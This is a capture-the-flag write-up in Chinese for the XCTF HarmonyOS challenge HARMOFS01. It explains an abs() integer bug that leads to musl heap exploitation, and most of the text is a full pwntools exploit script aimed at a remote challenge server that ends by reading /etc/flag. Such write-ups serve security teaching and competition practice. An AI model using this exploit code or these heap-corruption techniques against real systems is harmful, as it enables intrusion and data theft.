CTFHub

Writeup

HARMOFS01

发表于 分类于
Challenge | 2020 | XCTF高校网络安全专题挑战赛 | HarmonyOS和HMS专场 | RealWorld | HARMOFS01

点击此处获得更好的阅读体验

WriteUp来源

来自Venom战队发布

https://www.xctf.org.cn/library/details/5acdc1c31cf4935ac38fce445978888a5710cf11/

题目描述

简单的文件系统

题目考点

  • abs函数的漏洞

  • musl libc的堆利用

  • ROP

解题思路

abs(-0x80000000)=-0x80000000,从而导致我们可以负数溢出到size位,修改size,可以实现堆溢出,利用unlink到bss段可以实现任意读写,修改IO_stdout调用orw函数即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
from pwn import *
context.log_level = 'debug'
p = remote("124.70.204.134", 31460)
def touch(name, size):
  p.sendlineafter("Sh > ", "touch")
  p.sendlineafter("File size: ", str(size))
  p.sendlineafter("File name: ", name)
def read(name, size, note):
  p.sendlineafter("Sh > ", "fileop")
  p.sendlineafter("File name: ", name)
  p.sendlineafter("Operation: ", "1")
  p.sendlineafter("Size: ", str(size))
  p.send(note)
def write(name, size):
  p.sendlineafter("Sh > ", "fileop")
  p.sendlineafter("File name: ", name)
  p.sendlineafter("Operation: ", "2")
  p.sendlineafter("Size: ", str(size))
def seek1(name, offset):
  p.sendlineafter("Sh > ", "fileop")
  p.sendlineafter("File name: ", name)
  p.sendlineafter("Operation: ", "3")
  p.sendlineafter("Mode: ", "1")
  p.sendlineafter("Offset: ", str(offset))
def seek2(name, offset):
  p.sendlineafter("Sh > ", "fileop")
  p.sendlineafter("File name: ", name)
  p.sendlineafter("Operation: ", "3")
  p.sendlineafter("Mode: ", "2")
  p.sendlineafter("Offset: ", str(offset))
def free(name):
  p.sendlineafter("Sh > ", "fileop")
  p.sendlineafter("File name: ", name)
  p.sendlineafter("Operation: ", "4")
def exp():
  p.recvuntil("Gift: 0x")
  libc_base = int(p.recvuntil("\r", drop = True),16)-0x86EB8
  p.recvuntil("Gift: 0x")
  elf_base = int(p.recvuntil("\r", drop = True),16)-0x12d8

  touch("luck", 9)#00
  touch("LUCK", 9)#30
  touch("aaaa", 9)#60
  touch("bbbb", 9)#90
  touch("cccc", 9)#c0
  touch("dddd", 9)#f0
  touch("eeee", 9)#20
  touch("ffff", 9)#50
  touch("gggg", 9)#80
  touch("hhhh", 9)#b0
  touch("iiii", 9)#e0
  
  seek1("luck", 2147483648)
  seek1("luck", 2147483644)
  read("luck", 5, p32(0xffffffff)+'\n')
  
  free("bbbb")
  free("dddd")
  write("luck", 0x200)
  data = p.recvuntil("bbbb")
  heap_addr = u32(data[-12:-8])  

  seek1("aaaa", 2147483648)
  seek1("aaaa", 2147483644)
  read("aaaa", 5, p32(0xffffffff)+'\n')
  
  fake = 'a'*11+p32(0x31)+p32(0x30)+p32(elf_base+0x3034-12)+p32(elf_base+0x303c)+'bbbb\n'
  read("aaaa", len(fake), fake)
  free("aaaa")
  read(p32(elf_base+0x3034-12)+'\x00', 4, p32(libc_base+0x000A40A0)+'\n')
  seek2(p32(elf_base+0x3034-12)+'\x00', heap_addr+0x98)
  
  io_file = "\xA4\xBF\x43\xF0\xE9\x50\x81\x39\x57\x16\x52\x37\x00"
  seek2(io_file, 5)
  seek1(io_file, 2147483648)
  seek1(io_file, 2147483640-60)
  read(io_file, 4, p32(0xffffffff)+'\n')
  write(io_file, 0x12c)
  fake_file = '/etc/flag\x00'
  fake_file = fake_file.ljust(0x24, '\x00')
  fake_file += p32(elf_base+0x1248)
  read(io_file, 0x28, fake_file)

  log.info("elf_base == > " + hex(elf_base))
  log.info("libc_base == > " + hex(libc_base))
  log.info("heap_addr == > " + hex(heap_addr))
  p.interactive()
if __name__ == '__main__':
  exp()